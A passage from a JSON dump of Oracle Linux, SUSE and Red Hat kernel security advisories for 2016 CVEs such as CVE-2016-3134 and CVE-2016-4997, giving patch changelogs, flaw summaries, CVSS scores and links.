{CVE-2016-3134}\n- [net] netfilter: x_tables: don't reject valid target size on some architectures (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: enforce nul-terminated table name from getsockopt GET_ENTRIES (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: make sure e->next_offset covers remaining blob size (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: introduce and use xt_copy_counters_from_user (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: do compat validation via translate_table (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: xt_compat_match_from_user doesn't need a retval (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: arp_tables: simplify translate_compat_table args (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: ip6_tables: simplify translate_compat_table args (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: ip_tables: simplify translate_compat_table args (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: remove unused comefrom hookmask argument (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: validate all offsets and sizes in a rule (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: check for bogus target offset (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: check standard target size too (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: add compat version of xt_check_entry_offsets (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: assert minimum target size (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: kill check_entry helper (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: add and use xt_check_entry_offsets (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: validate targets of jumps (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: don't move to non-existent next rule (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: fix unconditional helper (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: validate e->target_offset early (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: check for size overflow (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [block] nvme: Add pci error handlers (David Milburn) [1350352 1288601]\n- [block] nvme: protect against simultaneous shutdown invocations (David Milburn) [1350352 1288601]\n- [block] nvme: Set affinity after allocating request queues (Frank Ramsay) [1350352 1288601]\n- [block] nvme: Fix device cleanup on initialization failure (David Milburn) [1350352 1288601]\n- [block] nvme: fix kernel memory corruption with short INQUIRY buffers (David Milburn) [1350352 1288601]\n- [net] bridge: include in6.h in if_bridge.h for struct in6_addr (Jiri Benc) [1331285 1268057]\n- [net] inet: defines IPPROTO_* needed for module alias generation (Jiri Benc) [1331285 1268057]\n- [net] sync some IP headers with glibc (Jiri Benc) [1331285 1268057]\n[3.10.0-327.33.1]\n- [powerpc] mm: don't do tlbie for updatepp request with NO HPTE fault (Gustavo Duarte) [1361462 1287289]\n- [mm] slub: do not drop slab_mutex for sysfs_slab_add (Larry Woodman) [1361019 1282934]\n[3.10.0-327.32.1]\n- [fs] xfs: give all workqueues rescuer threads (Brian Foster) [1359630 1298684]\n- [fs] xfs: cancel eofblocks background trimming on remount read-only (Brian Foster) [1358777 1339414]\n- [netdrv] bonding: Prevent IPv6 link local address on enslaved devices (Jarod Wilson) [1357868 1297931]\n- [kernel] ptrace: make wait_on_bit(JOBCTL_TRAPPING_BIT) in ptrace_attach() killable (Jiri Olsa) [1354285 1334503]\n[3.10.0-327.31.1]\n- [kernel] ptrace: task_clear_jobctl_trapping()->wake_up_bit() needs mb() (Daniel Bristot de Oliveira) [1354313 1350624]\n- [net] sctp: label accepted/peeled off sockets (Marcelo Leitner) [1354302 1247756]\n- [char] ipmi: Remove smi_msg from waiting_rcv_msgs list before handle_one_recv_msg() (David Arcari) [1353947 1348013]\n- [netdrv] bnx2x: don't wait for Tx completion on recovery (Michal Schmidt) [1351972 1320748]\n- [pci] aer: Clear error status registers during enumeration and restore (Prarit Bhargava) [1350304 1347459]\n[3.10.0-327.30.1]\n- [net] netfilter: bridge: Use __in6_dev_get rather than in6_dev_get in br_validate_ipv6 (Paolo Abeni) [1343640 1265259]\n- [net] netfilter: bridge: don't leak skb in error paths (Paolo Abeni) [1343640 1265259]\n- [net] netfilter: bridge: forward IPv6 fragmented packets (Paolo Abeni) [1343640 1265259]\n- [net] netfilter: bridge: re-order check_hbh_len() (Paolo Abeni) [1343640 1265259]\n- [net] netfilter: bridge: refactor frag_max_size (Paolo Abeni) [1343640 1265259]\n- [net] netfilter: bridge: really save frag_max_size between PRE and POST_ROUTING (Paolo Abeni) [1343640 1265259]\n- [net] bridge: Save frag_max_size between PRE_ROUTING and POST_ROUTING (Paolo Abeni) [1343640 1265259]\n[3.10.0-327.29.1]\n- [fs] fanotify: fix double free of pending permission events (Richard Guy Briggs) [1352939 1339092]\n- [fs] fsnotify: rename event handling functions (Richard Guy Briggs) [1352939 1339092]\n- [fs] fanotify: convert access_mutex to spinlock (Richard Guy Briggs) [1352939 1339092]\n- [fs] fanotify: use fanotify event structure for permission response processing (Richard Guy Briggs) [1352939 1339092]\n- [fs] fanotify: remove useless bypass_perm check (Richard Guy Briggs) [1352939 1339092]\n- [fs] fanotify: fix notification of groups with inode & mount marks (Miklos Szeredi) [1348828 1308393]\n- [fs] fsnotify: Allocate overflow events with proper type (Richard Guy Briggs) [1345774 1135562]\n- [fs] fanotify: Handle overflow in case of permission events (Richard Guy Briggs) [1345774 1135562]\n- [fs] fsnotify: Fix detection whether overflow event is queued (Richard Guy Briggs) [1345774 1135562]\n- [fs] inotify: Fix reporting of cookies for inotify events (Richard Guy Briggs) [1345774 1135562]\n- [fs] fanotify: Fix use after free for permission events (Richard Guy Briggs) [1345774 1135562]\n- [fs] fsnotify: Do not return merged event from fsnotify_add_notify_event() (Richard Guy Briggs) [1345774 1135562]\n- [fs] fanotify: Fix use after free in mask checking (Richard Guy Briggs) [1345774 1135562]\n- [fs] fsnotify: remove pointless NULL initializers (Richard Guy Briggs) [1345774 1135562]\n- [fs] fsnotify: remove .should_send_event callback (Richard Guy Briggs) [1345774 1135562]\n- [fs] fsnotify: do not share events between notification groups (Richard Guy Briggs) [1345774 1135562]\n- [fs] inotify: provide function for name length rounding (Richard Guy Briggs) [1345774 1135562]\n- [fs] revert 'inotify: don't add consecutive overflow events to the queue' (Richard Guy Briggs) [1345774 1135562]\n- Revert: [fs] fanotify: fix notification of groups with inode & mount marks (Miklos Szeredi) [1348828 1308393]", "edition": 4, "modified": "2016-09-14T00:00:00", "published": "2016-09-14T00:00:00", "id": "ELSA-2016-1847", "href": "http://linux.oracle.com/errata/ELSA-2016-1847.html", "title": "kernel security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583"], "description": "kernel-uek\n[3.8.13-118.14.1]\n- ecryptfs: forbid opening files without mmap handler (Jann Horn) [Orabug: 24971919] {CVE-2016-1583}\n- RDS: IB: fix panic with handlers running post teardown (Santosh Shilimkar) [Orabug: 24395795] ", "edition": 4, "modified": "2016-11-03T00:00:00", "published": "2016-11-03T00:00:00", "id": "ELSA-2016-3636", "href": "http://linux.oracle.com/errata/ELSA-2016-3636.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:37", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583"], "description": "kernel-uek\n[4.1.12-61.1.17]\n- sched: panic on corrupted stack end (Jann Horn) [Orabug: 24971921] {CVE-2016-1583}\n- ecryptfs: forbid opening files without mmap handler (Jann Horn) [Orabug: 24971921] {CVE-2016-1583}\n- proc: prevent stacking filesystems on top (Jann Horn) [Orabug: 24971921] {CVE-2016-1583}", "edition": 4, "modified": "2016-11-03T00:00:00", "published": "2016-11-03T00:00:00", "id": "ELSA-2016-3635", "href": "http://linux.oracle.com/errata/ELSA-2016-3635.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:48", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4470"], "description": "[2.6.39-400.283.2]\n- KEYS: potential uninitialized variable (Dan Carpenter) [Orabug: 24393863] {CVE-2016-4470}", "edition": 4, "modified": "2016-08-04T00:00:00", "published": "2016-08-04T00:00:00", "id": "ELSA-2016-3592", "href": "http://linux.oracle.com/errata/ELSA-2016-3592.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:39:30", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4470"], "description": "kernel-uek\n[3.8.13-118.9.2]\n- KEYS: potential uninitialized variable (Dan Carpenter) [Orabug: 24393864] {CVE-2016-4470}", "edition": 4, "modified": "2016-08-04T00:00:00", "published": "2016-08-04T00:00:00", "id": "ELSA-2016-3591", "href": "http://linux.oracle.com/errata/ELSA-2016-3591.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:57:33", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "description": "The SUSE Linux Enterprise 12 kernel was updated to receive critical\n security and bugfixes.\n\n Security issue fixed:\n - CVE-2016-4997: A buffer overflow in 32bit compat_setsockopt iptables\n handling could lead to a local privilege escalation. (bsc#986362)\n\n The following non-security bugs were fixed:\n - KVM: x86: expose invariant tsc cpuid bit (v2) (bsc#971770).\n - block: do not check request size in blk_cloned_rq_check_limits()\n (bsc#972124).\n - rbd: handle OBJ_REQUEST_SG types for copyup (bsc#983394).\n - target/rbd: do not put snap_context twice (bsc#981143).\n - target/rbd: remove caw_mutex usage (bsc#981143).\n\n", "edition": 1, "modified": "2016-06-30T21:07:43", "published": "2016-06-30T21:07:43", "id": "SUSE-SU-2016:1709-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00060.html", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:15:29", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "edition": 1, "description": "The SUSE Linux Enterprise 12 GA kernel was updated to receive one critical\n security fix.\n\n Security issue fixed:\n - CVE-2016-4997: A buffer overflow in 32bit compat_setsockopt iptables\n handling could lead to a local privilege escalation. (bsc#986362)\n\n", "modified": "2016-06-30T21:09:07", "published": "2016-06-30T21:09:07", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00061.html", "id": "SUSE-SU-2016:1710-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:42:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5829", "CVE-2016-4997", "CVE-2016-4470"], "description": "The SUSE Linux Enterprise 11 SP4 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n - CVE-2016-5829: Multiple heap-based buffer overflows in the\n hiddev_ioctl_usage function in drivers/hid/usbhid/hiddev.c in the Linux\n kernel allowed local users to cause a denial of service or possibly have\n unspecified other impact via a crafted (1) HIDIOCGUSAGES or (2)\n HIDIOCSUSAGES ioctl call (bnc#986572).\n - CVE-2016-4997: The compat IPT_SO_SET_REPLACE setsockopt implementation\n in the netfilter subsystem in the Linux kernel allowed local users to\n gain privileges or cause a denial of service (memory corruption) by\n leveraging in-container root access to provide a crafted offset value\n that triggers an unintended decrement (bnc#986362).\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bnc#984755).\n\n The following non-security bugs were fixed:\n - RDMA/cxgb4: Configure 0B MRs to match HW implementation (bsc#909589).\n - RDMA/cxgb4: Do not hang threads forever waiting on WR replies\n (bsc#909589).\n - RDMA/cxgb4: Fix locking issue in process_mpa_request (bsc#909589).\n - RDMA/cxgb4: Handle NET_XMIT return codes (bsc#909589).\n - RDMA/cxgb4: Increase epd buff size for debug interface (bsc#909589).\n - RDMA/cxgb4: Limit MRs to less than 8GB for T4/T5 devices (bsc#909589).\n - RDMA/cxgb4: Serialize CQ event upcalls with CQ destruction (bsc#909589).\n - RDMA/cxgb4: Wake up waiters after flushing the qp (bsc#909589).\n - bridge: superfluous skb-&gt;nfct check in br_nf_dev_queue_xmit (bsc#982544).\n - iucv: call skb_linearize() when needed (bnc#979915, LTC#141240).\n - kabi: prevent spurious modversion changes after bsc#982544 fix\n (bsc#982544).\n - mm/swap.c: flush lru pvecs on compound page arrival (bnc#983721).\n - mm: Fix DIF failures on ext3 filesystems (bsc#971030).\n - net/qlge: Avoids recursive EEH error (bsc#954847).\n - netfilter: bridge: Use __in6_dev_get rather than in6_dev_get in\n br_validate_ipv6 (bsc#982544).\n - netfilter: bridge: do not leak skb in error paths (bsc#982544).\n - netfilter: bridge: forward IPv6 fragmented packets (bsc#982544).\n - qeth: delete napi struct when removing a qeth device (bnc#979915,\n LTC#143590).\n - s390/mm: fix asce_bits handling with dynamic pagetable levels\n (bnc#979915, LTC#141456).\n - s390/pci: fix use after free in dma_init (bnc#979915, LTC#141626).\n - s390: fix test_fp_ctl inline assembly contraints (bnc#979915,\n LTC#143138).\n - sched/cputime: Fix clock_nanosleep()/clock_gettime() inconsistency\n (bnc#988498).\n - sched/cputime: Fix cpu_timer_sample_group() double accounting\n (bnc#988498).\n - sched: Provide update_curr callbacks for stop/idle scheduling classes\n (bnc#988498).\n - x86/mm/pat, /dev/mem: Remove superfluous error message (bsc#974620).\n\n", "edition": 1, "modified": "2016-08-09T21:09:10", "published": "2016-08-09T21:09:10", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00027.html", "id": "SUSE-SU-2016:2018-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:40:12", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4794", "CVE-2016-5829", "CVE-2016-4997", "CVE-2016-4470"], "description": "The openSUSE Leap 42.1 was updated to 4.1.27 to receive various security\n and bugfixes.\n\n The following security bugs were fixed:\n - CVE-2016-4997: A buffer overflow in 32bit compat_setsockopt iptables\n handling could lead to a local privilege escalation. (bsc#986362)\n - CVE-2016-5829: Multiple heap-based buffer overflows in the\n hiddev_ioctl_usage function in drivers/hid/usbhid/hiddev.c in the Linux\n kernel allow local users to cause a denial of service or possibly have\n unspecified other impact via a crafted (1) HIDIOCGUSAGES or (2)\n HIDIOCSUSAGES ioctl call (bnc#986572).\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bnc#984755).\n - CVE-2016-4794: Use-after-free vulnerability in mm/percpu.c in the Linux\n kernel allowed local users to cause a denial of service (BUG)\n or possibly have unspecified other impact via crafted use of the mmap\n and bpf system calls (bnc#980265).\n\n The following non-security bugs were fixed:\n - Refresh patches.xen/xen-netback-coalesce: Restore copying of SKBs with\n head exceeding page size (bsc#978469).\n - Refresh patches.xen/xen3-patch-2.6.26 (fix PAT initialization).\n - Refresh patches.xen/xen3-patch-2.6.39 (fix ia32_compat inheritance).\n - Refresh patches.xen/xen3-patch-3.14: Suppress atomic file position\n updates for /proc/xen/xenbus (bsc#970275).\n - Refresh patches.xen/xen3-patch-3.16 (drop redundant addition of a\n comment).\n - Refresh patches.xen/xen3-patch-4.1.7-8.\n - base: make module_create_drivers_dir race-free (bnc#983977).\n - ipvs: count pre-established TCP states as active (bsc#970114).\n - net: thunderx: Fix TL4 configuration for secondary Qsets (bsc#986530).\n - net: thunderx: Fix link status reporting (bsc#986530).\n\n", "edition": 1, "modified": "2016-07-14T14:08:15", "published": "2016-07-14T14:08:15", "id": "OPENSUSE-SU-2016:1798-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00014.html", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:18:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583"], "description": "The SUSE Linux Enterprise 12 GA kernel was updated to fix one security\n issue.\n\n The following security bug was fixed:\n - CVE-2016-1583: Prevent the usage of mmap when the lower file system does\n not allow it. This could have lead to local privilege escalation when\n ecryptfs-utils was installed and /sbin/mount.ecryptfs_private was setuid\n (bsc#983143).\n\n", "edition": 1, "modified": "2016-06-16T15:07:58", "published": "2016-06-16T15:07:58", "id": "SUSE-SU-2016:1596-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00027.html", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:35:13", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4470"], "edition": 1, "description": "This update for the Linux Kernel 3.12.60-52_54 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bsc#984764).\n\n", "modified": "2016-08-09T17:17:48", "published": "2016-08-09T17:17:48", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00012.html", "id": "SUSE-SU-2016:1998-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 15 for SLE 12 (important)", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:36:24", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4470"], "description": "This update for the Linux Kernel 3.12.60-52_49 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bsc#984764).\n\n", "edition": 1, "modified": "2016-08-09T17:18:11", "published": "2016-08-09T17:18:11", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00013.html", "id": "SUSE-SU-2016:1999-1", "title": "Security update for Linux Kernel Live Patch 14 for SLE 12 (important)", "type": "suse", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:13:42", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "description": "This update for the Linux Kernel 3.12.57-60_35 fixes the several issues.\n\n These security issues were fixed:\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bsc#984764).\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (stack memory consumption) via\n vectors involving crafted mmap calls for /proc pathnames, leading to\n recursive pagefault handling (bsc#983144).\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel\n incorrectly relied on the write system call, which allowed local users\n to cause a denial of service (kernel memory write operation) or possibly\n have unspecified other impact via a uAPI interface (bsc#980883).\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in the Linux\n kernel allowed local users to gain privileges via crafted ASN.1 data\n (bsc#980856).\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attackers to cause a denial of service (panic)\n via an ASN.1 BER file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not\n validate certain offset fields, which allowed local users to gain\n privileges or cause a denial of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n", "edition": 1, "modified": "2016-08-09T17:18:31", "published": "2016-08-09T17:18:31", "id": "SUSE-SU-2016:2000-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00014.html", "type": "suse", "title": "Security update for Linux Kernel Live Patch 4 for SLE 12 SP1 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:17", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3134", "CVE-2016-4997", "CVE-2016-4998"], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nThe kernel-rt packages have been upgraded to version 3.10.0-327.rt56.197, which provides a number of bug fixes over the previous version. (BZ#1366059)\n\nSecurity Fix(es):\n\n* A security flaw was found in the Linux kernel in the mark_source_chains() function in \"net/ipv4/netfilter/ip_tables.c\". It is possible for a user-supplied \"ipt_entry\" structure to have a large \"next_offset\" field. This field is not bounds checked prior to writing to a counter value at the supplied offset. (CVE-2016-3134, Important)\n\n* A flaw was discovered in processing setsockopt for 32 bit processes on 64 bit systems. This flaw will allow attackers to alter arbitrary kernel memory when unloading a kernel module. This action is usually restricted to root-privileged users but can also be leveraged if the kernel is compiled with CONFIG_USER_NS and CONFIG_NET_NS and the user is granted elevated privileges. (CVE-2016-4997, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. (CVE-2016-4998, Moderate)", "modified": "2018-06-07T08:58:30", "published": "2016-09-14T18:42:27", "id": "RHSA-2016:1883", "href": "https://access.redhat.com/errata/RHSA-2016:1883", "type": "redhat", "title": "(RHSA-2016:1883) Important: kernel-rt security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:30:42", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3134", "CVE-2016-4997", "CVE-2016-4998", "CVE-2016-6197", "CVE-2016-6198"], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nThe kernel-rt packages have been upgraded to the kernel-3.10.0-327.36.1 source tree, which provides a number of bug fixes over the previous version. (BZ#1366538)\n\nSecurity Fix(es):\n\n* A security flaw was found in the Linux kernel in the mark_source_chains() function in \"net/ipv4/netfilter/ip_tables.c\". It is possible for a user-supplied \"ipt_entry\" structure to have a large \"next_offset\" field. This field is not bounds checked prior to writing to a counter value at the supplied offset. (CVE-2016-3134, Important)\n\n* A flaw was discovered in processing setsockopt for 32 bit processes on 64 bit systems. This flaw will allow attackers to alter arbitrary kernel memory when unloading a kernel module. This action is usually restricted to root-privileged users but can also be leveraged if the kernel is compiled with CONFIG_USER_NS and CONFIG_NET_NS and the user is granted elevated privileges. (CVE-2016-4997, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. (CVE-2016-4998, Moderate)", "modified": "2018-03-19T16:29:52", "published": "2016-09-14T18:34:58", "id": "RHSA-2016:1875", "href": "https://access.redhat.com/errata/RHSA-2016:1875", "type": "redhat", "title": "(RHSA-2016:1875) Important: kernel-rt security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:30:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3134", "CVE-2016-4997", "CVE-2016-4998", "CVE-2016-6197", "CVE-2016-6198"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A security flaw was found in the Linux kernel in the mark_source_chains() function in \"net/ipv4/netfilter/ip_tables.c\". It is possible for a user-supplied \"ipt_entry\" structure to have a large \"next_offset\" field. This field is not bounds checked prior to writing to a counter value at the supplied offset. (CVE-2016-3134, Important)\n\n* A flaw was discovered in processing setsockopt for 32 bit processes on 64 bit systems. This flaw will allow attackers to alter arbitrary kernel memory when unloading a kernel module. This action is usually restricted to root-privileged users but can also be leveraged if the kernel is compiled with CONFIG_USER_NS and CONFIG_NET_NS and the user is granted elevated privileges. (CVE-2016-4997, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. (CVE-2016-4998, Moderate)\n\nBug Fix(es):\n\n* In some cases, running the ipmitool command caused a kernel panic due to a race condition in the ipmi message handler. This update fixes the race condition, and the kernel panic no longer occurs in the described scenario. (BZ#1353947)\n\n* Previously, running I/O-intensive operations in some cases caused the system to terminate unexpectedly after a null pointer dereference in the kernel. With this update, a set of patches has been applied to the 3w-9xxx and 3w-sas drivers that fix this bug. As a result, the system no longer crashes in the described scenario. (BZ#1362040)\n\n* Previously, the Stream Control Transmission Protocol (SCTP) sockets did not inherit the SELinux labels properly. As a consequence, the sockets were labeled with the unlabeled_t SELinux type which caused SCTP connections to fail. The underlying source code has been modified, and SCTP connections now works as expected. (BZ#1354302)\n\n* Previously, the bnx2x driver waited for transmission completions when recovering from a parity event, which substantially increased the recovery time. With this update, bnx2x does not wait for transmission completion in the described circumstances. As a result, the recovery of bnx2x after a parity event now takes less time. (BZ#1351972)\n\nEnhancement(s):\n\n* With this update, the audit subsystem enables filtering of processes by name besides filtering by PID. Users can now audit by executable name (with the \"-F exe=<path-to-executable>\" option), which allows expression of many new audit rules. This functionality can be used to create events when specific applications perform a syscall. (BZ#1345774)\n\n* With this update, the Nonvolatile Memory Express (NVMe) and the multi-queue block layer (blk_mq) have been upgraded to the Linux 4.5 upstream version. Previously, a race condition between timeout and freeing request in blk_mq occurred, which could affect the blk_mq_tag_to_rq() function and consequently a kernel oops could occur. The provided patch fixes this race condition by updating the tags with the active request. The patch simplifies blk_mq_tag_to_rq() and ensures that the two requests are not active at the same time. (BZ#1350352)\n\n* The Hyper-V storage driver (storvsc) has been upgraded from upstream. This update provides moderate performance improvement of I/O operations when using storvscr for certain workloads. (BZ#1360161)\n\nAdditional Changes:\n\nSpace precludes documenting all of the bug fixes and enhancements included in this advisory. To see the complete list of bug fixes and enhancements, refer to the following KnowledgeBase article: https://access.redhat.com/articles/2592321", "modified": "2018-04-12T03:33:05", "published": "2016-09-14T18:34:54", "id": "RHSA-2016:1847", "href": "https://access.redhat.com/errata/RHSA-2016:1847", "type": "redhat", "title": "(RHSA-2016:1847) Important: kernel security, bug fix, and enhancement update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* It was found that stacking a file system over procfs in the Linux kernel could lead to a kernel stack overflow due to deep nesting, as demonstrated by mounting ecryptfs over procfs and creating a recursion by mapping /proc/environ. An unprivileged, local user could potentially use this flaw to escalate their privileges on the system. (CVE-2016-1583, Important)\n\nBug Fix(es):\n\n* Previously, while the MAP_GROWSDOWN flag was set, writing to the memory which was mapped with the mmap system call failed with the SIGBUS signal. This update fixes memory management in the Linux kernel by backporting an upstream patch that enlarges the stack guard page gap. As a result, mmap now works as expected under the described circumstances. (BZ#1474721)", "modified": "2017-09-19T11:07:12", "published": "2017-09-19T10:59:07", "id": "RHSA-2017:2760", "href": "https://access.redhat.com/errata/RHSA-2017:2760", "type": "redhat", "title": "(RHSA-2017:2760) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:33", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4470"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A flaw was found in the Linux kernel's keyring handling code, where in key_reject_and_link() an uninitialized variable would eventually lead to arbitrary free address which could allow attacker to use a 